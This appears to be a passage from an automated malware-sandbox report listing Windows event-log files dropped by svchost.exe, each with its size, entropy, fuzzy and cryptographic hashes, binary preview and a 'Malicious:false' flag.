                                                      Preview:ElfChnk.T...............T...................P...h..............................................................................+........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.801423310886069
                                                      Encrypted:false
                                                      SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                      MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                      SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                      SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                      SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.996272372482282
                                                      Encrypted:false
                                                      SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                      MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                      SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                      SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                      SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):76320
                                                      Entropy (8bit):3.9184731745191157
                                                      Encrypted:false
                                                      SSDEEP:768:IvlWkvlWhjV8k+u7eUtHpoVPGWUy07SZRcZv76NcRkpHrWbGyYKQc90X0Ozth0B8:ljV8k+u7PtHpoVPGxWzthf
                                                      MD5:FCC2754991B7A152B99780BE4089C65B
                                                      SHA1:A345FCB6676F05EE3D1D50DC046BA451DBEC1B04
                                                      SHA-256:B6474C11999A1865611910FCD2887FCCC172B283589DCC89A38B3ABF14939CF2
                                                      SHA-512:A4D44C04B24B9CA752A30F7651DF71D9874FAA2D88906622DFE919036D341B20F0C4C34F87A7203CAA7DE7068CB0B1B20840439C216269E00605C4D31496BFCF
                                                      Malicious:false
                                                      Preview:ElfChnk.................P.......U...............x......w........................................................................................ ...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..P...P........\.o..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.738342213258453
                                                      Encrypted:false
                                                      SSDEEP:384:Dh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnr:DkN2cTOsKAnIpVESEbxNrjzDbRt
                                                      MD5:F971745114B36581EA6020128FB66F9D
                                                      SHA1:B1D2B9476CDA4074E532246D6B5A8D944026B2B9
                                                      SHA-256:1459D62063A0C0B38B90B3C6349D4B849CED19A11746DC585FC2BE65A0F39C62
                                                      SHA-512:D3BDA44556710BE15798E77091F459D53DCF5BB0DC7FCA660BDAA6DC1BFD963FA3238074E33D49B161258C6FDAA88DA723344A396B41EE47CE5F878A6D5967B4
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................0........Y0........................................................................................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7590316238843728
                                                      Encrypted:false
                                                      SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                      MD5:B074238315662886E2BD70106D08A747
                                                      SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                      SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                      SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.7512622527805637
                                                      Encrypted:false
                                                      SSDEEP:1536:uXhhUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:uXPnS
                                                      MD5:674C1241792D48563659E74755F8160D
                                                      SHA1:D2F57D284BBE79688D21DC7B24407D107313E866
                                                      SHA-256:C7629EB835556F64E62C5A67AB71F0FAFCA49F99DB7A4DD86F67AE418CA9D287
                                                      SHA-512:06A16A1EAC164D12DA0EC8DD21A0B3E31D9481BC17A2BE7CD69D46EDDA4AFBC894AF399BC9AF9E23BDB4AA3D4DE5654B920C4A07FD8E0BF4B5013B722401CF0B
                                                      Malicious:false
                                                      Preview:ElfChnk.........%...............%............E..`G..zV......................................................................JB.Z................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.3069197485541766
                                                      Encrypted:false
                                                      SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                      MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                      SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                      SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                      SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                      Malicious:false
                                                      Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):127536
                                                      Entropy (8bit):4.002504841511839
                                                      Encrypted:false
                                                      SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqAh0w+qLpBVi7CPME79nCxkSqlo:c0w+qtBVix0w+qtBViGo
                                                      MD5:F087536095F7D9207882B71BC985FCCB
                                                      SHA1:A481315760A02C8ABC1D7C237AAB9133A5FA0867
                                                      SHA-256:582AF5ACB55D782704EE34F77BD31C6383718BAEDD735F5DEA75D0B15613381E
                                                      SHA-512:C1111A2D4F0C63F86A9AD55F471DED337CB886F2EB5122B380762ABFE906DD7B560A2AE43D5F35D0E10ACBE52BDCF1AD169F4A8E44C6C802F25D1D74B71107DF
                                                      Malicious:false
                                                      Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.2909571978750325
                                                      Encrypted:false
                                                      SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                      MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                      SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                      SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                      SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.488768580471203
                                                      Encrypted:false
                                                      SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                      MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                      SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                      SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                      SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):110280
                                                      Entropy (8bit):4.498129753183186
                                                      Encrypted:false
                                                      SSDEEP:3072:+cRFkL1TWX0gkB/J7oasEfyk2/vKlqk/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20GpB:uNN
                                                      MD5:5C1CBA27D62D0FDEB339B82CEAEE22DF
                                                      SHA1:D0D220ADCE3ECBC912C8BF386CD3101C1167778F
                                                      SHA-256:B925AC34ACCDFB80EF53A918BCCFB6F78C39B513AC7E38CB46D1BBB19EAAC9D6
                                                      SHA-512:16DE86DA8774E70D1AFC2FD951735966454DF9DE9A666432A65A9FD7BDF50958A0EE2E5FA8F934B6650338DEC43A40FC75F084532E754EE3BC0FF2D8103A8431
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 0.001734
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.494601434214266
                                                      Encrypted:false
                                                      SSDEEP:384:ZhN7s7o787l7r787a7J7z7+7N17g7n767g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:Z97uCg
                                                      MD5:4510D6B4D4F13962B3F66FA5828E5DFB
                                                      SHA1:CD282AAC16DAED1BA74B87D04B2C2A33F625AEC4
                                                      SHA-256:41B92AE9541B4F6BEE7163735327F3644C068E86E3150251F83591F6B56B8755
                                                      SHA-512:BE32258BCA2B476B3E178418356EC09BFF86B87D19A319C616B37BE28E4B992A503FD75C4114778F987B502453DAC4A2A1775D0C763E74A0BB8037BCF4FCAE13
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.1499045494600955
                                                      Encrypted:false
                                                      SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                      MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                      SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                      SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                      SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8164696340947971
                                                      Encrypted:false
                                                      SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                      MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                      SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                      SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                      SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9855903635327656
                                                      Encrypted:false
                                                      SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                                      MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                      SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                      SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                      SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.165454452307923
                                                      Encrypted:false
                                                      SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                      MD5:B6B6F199DA64422984403D7374F32528
                                                      SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                      SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                      SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.8519554794255333
                                                      Encrypted:false
                                                      SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                      MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                      SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                      SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                      SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.1642919553794224
                                                      Encrypted:false
                                                      SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                      MD5:D7EECF043241FDB9486580582E208603
                                                      SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                      SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                      SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):75320
                                                      Entropy (8bit):4.584741934833894
                                                      Encrypted:false
                                                      SSDEEP:768:ZOIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbNQP:n+Jao7mce8pGP
                                                      MD5:E7AEFEC2DD127DC96ECB7999BF7D914A
                                                      SHA1:4D9EF3BDA86F074AB1C29D8D992DB7FDB549F5A7
                                                      SHA-256:93CDEEAFD2278C85738ADFBB4C79D2E19C088749FD249B242C56D93EF8C44653
                                                      SHA-512:C0E2D798045FA2FED7AFF072FC35886383A239354CC1C657D9AD4E576C163E21E57BA27E8E22FC29A1EE7A981A3BCC34EC89FF7F203ABFF020703F2DAC934486
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                      Category:dropped
                                                      Size (bytes):79016
                                                      Entropy (8bit):1.819103257557747
                                                      Encrypted:false
                                                      SSDEEP:384:yVhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmEgUmHhL6UsE0ZK:CY7Lt+Y7Lt
                                                      MD5:9F8EEE9CE2531266167865A3B4C3F325
                                                      SHA1:1E2B096410C54918215754072990080AE7D6A897
                                                      SHA-256:E0EF1A0A537C1DD50ECC9DF87D52EC03022C2A42B7291A40B854C3AB8689D965
                                                      SHA-512:71AD58A81DB8483D70630FD8FFF2AB9F25E178AB74CEA4977F851C1924BFDFCCB340E789370F5E4AB454D979C406283454BB6DD80AC9BFCF90CA6B8B7E28D902
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.20418860310301978
                                                      Encrypted:false
                                                      SSDEEP:48:MKxW4LrP+MZQNRBEZWTENO4bpBkoXY/6FgVt:T/VKNVaO80oXY/6Fg
                                                      MD5:3E839D8CF1477668367C0DBC1980300F
                                                      SHA1:C16739D122678228116283ADB81FF343E1529153
                                                      SHA-256:684526EF64389582C8A0F9496FA79BF3523598C891C68F7FDDF6BC32B4E6A646
                                                      SHA-512:3ED69776FA934986595F0666D777AF7B72C19924D34871EACC9EABEF8F1CB732C2BD904858978CE3C2A0CFCA58F819CF3FFAC6FBDACE79722D470B0B1DB3B2B9
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.6469884746870727
                                                      Encrypted:false
                                                      SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                      MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                      SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                                      SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                      SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.402886152057497
                                                      Encrypted:false
                                                      SSDEEP:768:IHa0Nfa3aXaDaLarazaTaLa3a7aLaza3ana/aXajaTa/aLavababa7afaDaTaTaL:WN
                                                      MD5:D661493496BAE821A563CDA5520A66B3
                                                      SHA1:62CE940CC712CF5E58D4934D7437669F28C57962
                                                      SHA-256:CEE4D2A44ED3F35B5942EA69D15FDC3B37A4D08B5EF7D77BEE583669C6BD36C0
                                                      SHA-512:5E1891166E341A4BDF10BE2FBC982FF8963070CA945FD6F736D1007C9C19EE38060ACCA35A64047FE35BBCCED1EC8146D1DACCA5A7B827A91235813AF817E638
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.3132453844344478
                                                      Encrypted:false
                                                      SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                      MD5:6237EE0458A0478242B975E9BB7AA97D
                                                      SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                      SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                      SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.325262033408211
                                                      Encrypted:false
                                                      SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                      MD5:D13189B45679E53F5744A4D449F8B00F
                                                      SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                      SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                      SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7947046118743749
                                                      Encrypted:false
                                                      SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                      MD5:55E73A924B170FBFFF862E8E195E839A
                                                      SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                                      SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                      SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):132232
                                                      Entropy (8bit):4.370295335010861
                                                      Encrypted:false
                                                      SSDEEP:384:dORORcxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+Pl:dYxA8nPLGb7xA8nPLGbUd
                                                      MD5:5595337EDCADB2DBD966CAC1D5A1354B
                                                      SHA1:BE7C58E6DF4E2FD116F2215198B77B011D3DC5CB
                                                      SHA-256:FD4CEBD864E570F414B2BE882A446924137C6541A0E8F61AD818F760ACAC4EED
                                                      SHA-512:BFC0AAB2C43AC5454DE39ABB31C601A0C601ED1E30CA697B123344BD7499C60025C813AA84B3F2ADEEE282367D517FC4A2A2D66BDB9223CE1DCD44D93632CDEF
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.273338343434408
                                                      Encrypted:false
                                                      SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                      MD5:C37372EB51AEDB4552CB839C7294403A
                                                      SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                      SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                      SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.231195890775603
                                                      Encrypted:false
                                                      SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                      MD5:3365A34953FD7B16667108A049B64DA5
                                                      SHA1:C72421A58E063D64072152344B266F8306A78702
                                                      SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
